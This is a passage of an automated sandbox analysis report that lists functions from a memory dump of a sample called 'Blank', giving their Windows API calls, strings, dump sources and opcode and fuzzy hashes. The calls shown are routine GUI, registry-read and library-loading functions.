                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                    • Opcode ID: f24282835f95fc0d0936e7735889ddb24ee74c9a7e6628f5c224e986c25bb158
                                                                                                                                    • Instruction ID: aa86af4900ef546793536ff88c143050c982435990ca9571db4121e5221f8750
                                                                                                                                    • Opcode Fuzzy Hash: f24282835f95fc0d0936e7735889ddb24ee74c9a7e6628f5c224e986c25bb158
                                                                                                                                    • Instruction Fuzzy Hash: 8C21AEB5614249AFDB11DF58DCC5DA737EDEB5A3A4B440059FA049B2A1CB70EC21CBA0
                                                                                                                                    Function 002E72D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002E7360
                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002E7370
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002E7395
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                    • String ID: Listbox
                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                    • Opcode ID: 0568cd6f9d4da367c41700cafda168dbbdfc76c0fcf91a1e720f21482f66538b
                                                                                                                                    • Instruction ID: 08f35c37d7d42161bab6921fe2be9a879488a1d04ac6ff1c76ff47ee1b7c5740
                                                                                                                                    • Opcode Fuzzy Hash: 0568cd6f9d4da367c41700cafda168dbbdfc76c0fcf91a1e720f21482f66538b
                                                                                                                                    • Instruction Fuzzy Hash: 03210432664119BFDF128F55CC85EFF37AAEF89760F408164FD009B190C671AC619BA0
                                                                                                                                    Function 002E7D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002E7D97
                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002E7DAC
                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002E7DB9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                    • Opcode ID: c854166aa6113a908096f9697b161b3122459ecfa93f4e6f73f658d7b74da205
                                                                                                                                    • Instruction ID: 41bc5b0ddf6c3f6cb8a602caaad6107b87b6279c9f1deda97de2623f2469d874
                                                                                                                                    • Opcode Fuzzy Hash: c854166aa6113a908096f9697b161b3122459ecfa93f4e6f73f658d7b74da205
                                                                                                                                    • Instruction Fuzzy Hash: B61106722A4249BEDF249F65CC45FEB37ADEF89B64F114128FA41A60D0D771D861CB20
                                                                                                                                    Function 002E6F45 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 002E6FC7
                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002E6FD6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                    • String ID: -fr$edit
                                                                                                                                    • API String ID: 2978978980-1039004985
                                                                                                                                    • Opcode ID: c57dcebd1aa2ec022e549589cc0cd4aac7d97df213d56a5c7f3e17eb04f8e8c6
                                                                                                                                    • Instruction ID: 006987e58975efc55066b70c7b1199cc1ceff3d4cdb758fa7e4f794ce96ec98a
                                                                                                                                    • Opcode Fuzzy Hash: c57dcebd1aa2ec022e549589cc0cd4aac7d97df213d56a5c7f3e17eb04f8e8c6
                                                                                                                                    • Instruction Fuzzy Hash: 1011BF71160249AFEB104E65EC88EFB3B6AEF253B4F904324F926935E0C771DC609B60
                                                                                                                                    Function 00261284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00261275,SwapMouseButtons,00000004,?), ref: 002612A8
                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00261275,SwapMouseButtons,00000004,?), ref: 002612C9
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,80000001,80000001,?,00261275,SwapMouseButtons,00000004,?), ref: 002612EB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                    • Opcode ID: c1207e7c698aba2f5c86d594283358eefbe1267706dd79075bbc89bb905db464
                                                                                                                                    • Instruction ID: 78829226fcc2461b44260f4944a5079e3020206ff9303240af5d8b7522feac7f
                                                                                                                                    • Opcode Fuzzy Hash: c1207e7c698aba2f5c86d594283358eefbe1267706dd79075bbc89bb905db464
                                                                                                                                    • Instruction Fuzzy Hash: 97114871920218BFDB208FA4DC84EAEBBA8EF04751F144569E805D7210D671AEA097A0
                                                                                                                                    Function 00280FE6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0028593C: __FF_MSGBANNER.LIBCMT ref: 00285953
                                                                                                                                      • Part of subcall function 0028593C: __NMSG_WRITE.LIBCMT ref: 0028595A
                                                                                                                                      • Part of subcall function 0028593C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000004,?,?,00281003,?), ref: 0028597F
                                                                                                                                    • std::exception::exception.LIBCMT ref: 0028101C
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00281031
                                                                                                                                      • Part of subcall function 002887CB: RaiseException.KERNEL32(?,?,?,0031CAF8,?,?,?,?,?,00281036,?,0031CAF8,?,00000001), ref: 00288820
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                    • String ID: `=/$h=/
                                                                                                                                    • API String ID: 2103478672-1157818411
                                                                                                                                    • Opcode ID: af728958d87630e95dc42beab0865ca5fecbbba719fe2541fd44685eda144052
                                                                                                                                    • Instruction ID: 0a073f4855f10106d33c04a37733349f5ae6c1d5bf7536b50e0d72d2f8688250
                                                                                                                                    • Opcode Fuzzy Hash: af728958d87630e95dc42beab0865ca5fecbbba719fe2541fd44685eda144052
                                                                                                                                    • Instruction Fuzzy Hash: 5FF0F43C52621EA2CB20FA58DC019EEBBAC9F01350F500425FE04A25C1DFB08BB1CBE1
                                                                                                                                    Function 0029B4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0029B544: _memset.LIBCMT ref: 0029B551
                                                                                                                                      • Part of subcall function 00280B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0029B520,?,?,?,0026100A), ref: 00280B79
                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0026100A), ref: 0029B524
                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0026100A), ref: 0029B533
                                                                                                                                    Strings
                                                                                                                                    • =0, xrefs: 0029B514
                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0029B52E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=0
                                                                                                                                    • API String ID: 3158253471-3530269625
                                                                                                                                    • Opcode ID: 4b4d6188b37e05d37ef9e1cbf9f53eaa4d1cf565ac9b1b82a9eb2572003f97b4
                                                                                                                                    • Instruction ID: 1a3c454ed6fc0fe09adb391bfaf062848a6defa85a19f59097bbca9bbdb0d140
                                                                                                                                    • Opcode Fuzzy Hash: 4b4d6188b37e05d37ef9e1cbf9f53eaa4d1cf565ac9b1b82a9eb2572003f97b4
                                                                                                                                    • Instruction Fuzzy Hash: 59E092742113518FD732AF35F548B527BE4AF04754F41896DE446C2381DBB4E544CFA1
                                                                                                                                    Function 002DC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,002A027A,?), ref: 002DC6E7
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002DC6F9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-1816364905
                                                                                                                                    • Opcode ID: cb4f8dbfc842d4ce6315288da494de93067ee11af4ffd89d77a5ffffa78c7267
                                                                                                                                    • Instruction ID: 32e1aa9d35c9629d8f7d81b71ae4db8ca0f43f6a02a2645351903ff4a7b774b8
                                                                                                                                    • Opcode Fuzzy Hash: cb4f8dbfc842d4ce6315288da494de93067ee11af4ffd89d77a5ffffa78c7267
                                                                                                                                    • Instruction Fuzzy Hash: C7E0EC795207138BE7215F26DC99AA6B6FCAF047A5BA0842AE889D2351E770DC90CB10
                                                                                                                                    Function 00274B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00274B44,?,002749D4,?,?,002727AF,?,00000001), ref: 00274B85
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00274B97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                                    • Opcode ID: 7508cdc943a42d220b7b510ce385e1ee5e0aafafd2902ea56dce179bb1c80f09
                                                                                                                                    • Instruction ID: 3e9b8b6942b3b22eb100971e789ea10289bbf4d2758e2071623da2e4e2419810
                                                                                                                                    • Opcode Fuzzy Hash: 7508cdc943a42d220b7b510ce385e1ee5e0aafafd2902ea56dce179bb1c80f09
                                                                                                                                    • Instruction Fuzzy Hash: C3D01770A20713CFD720AF31ECA8B57B6E4AF057A5F55D83AD48AE2551E7B0E890CA14
                                                                                                                                    Function 00274BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00274AF7,?), ref: 00274BB8
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00274BCA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                                    • Opcode ID: 7cb89da36703a1b963b0d35e0fb56eabc8b3e6b680470624537ceac8e0b30cba
                                                                                                                                    • Instruction ID: 28f233dc1fbe293ba464890785f1883ea505ee944b4f72d10ca07c8e46eb9d68
                                                                                                                                    • Opcode Fuzzy Hash: 7cb89da36703a1b963b0d35e0fb56eabc8b3e6b680470624537ceac8e0b30cba
                                                                                                                                    • Instruction Fuzzy Hash: C5D0C2308203138FD3205F32EC4875772E4AF04390B00DC39D489C2551EB70C890CA10
                                                                                                                                    Function 002E1447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,002E1696), ref: 002E1455
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002E1467
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                                    • Opcode ID: 42d3619c8e2c39b9e37d268c3090a221805758500a5e583b6172de70b355e603
                                                                                                                                    • Instruction ID: 7780d4290a5b1888ddd67b256b477e9efb1d573d5b131b36e8ad7fdb9605cb09
                                                                                                                                    • Opcode Fuzzy Hash: 42d3619c8e2c39b9e37d268c3090a221805758500a5e583b6172de70b355e603
                                                                                                                                    • Instruction Fuzzy Hash: FCD012305A07139FD7215F76D84869776E4AF06395B51C83AD4D5D2291D670D4D0C610
                                                                                                                                    Function 002755F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00275E3D), ref: 002755FE
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00275610
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                                    • Opcode ID: b71348267fbaf5d48665461f68c5a552254ee312fa88a34f08823ef6250607fe
                                                                                                                                    • Instruction ID: e0d488650896064aa8b094d5d214266b959bb24bab78d3f9ff9b527752f02e98
                                                                                                                                    • Opcode Fuzzy Hash: b71348267fbaf5d48665461f68c5a552254ee312fa88a34f08823ef6250607fe
                                                                                                                                    • Instruction Fuzzy Hash: A9D01774D30B23CFE7209F31DC98627B6E9AF057A5B51C83AD48AD2192F6B0C890CA50
                                                                                                                                    Function 002D97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,002D93DE,?,002F0980), ref: 002D97D8
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002D97EA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                                    • Opcode ID: f6f484202123cd03b8037709aeb316f08eee071085b735435b1197c020062412
                                                                                                                                    • Instruction ID: e29286c7c3de8416d145a9e0b945fcf9bd5c4fd4079686f97492735a0127ef73
                                                                                                                                    • Opcode Fuzzy Hash: f6f484202123cd03b8037709aeb316f08eee071085b735435b1197c020062412
                                                                                                                                    • Instruction Fuzzy Hash: 0FD012709207138FE7205F31ECD8657F6E4AF097D1B11887AE4C5D2291EB70C8D0C651
                                                                                                                                    Function 002B7D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a6f355cf59953e4dd31ad587ee7bb03d3273a04b815fe0ce199082af9e7989dd
                                                                                                                                    • Instruction ID: 73d26db466b554d7a13acc80654770f6ec2e62c14a5eb2c6d1ac77bb3cc80de4
                                                                                                                                    • Opcode Fuzzy Hash: a6f355cf59953e4dd31ad587ee7bb03d3273a04b815fe0ce199082af9e7989dd
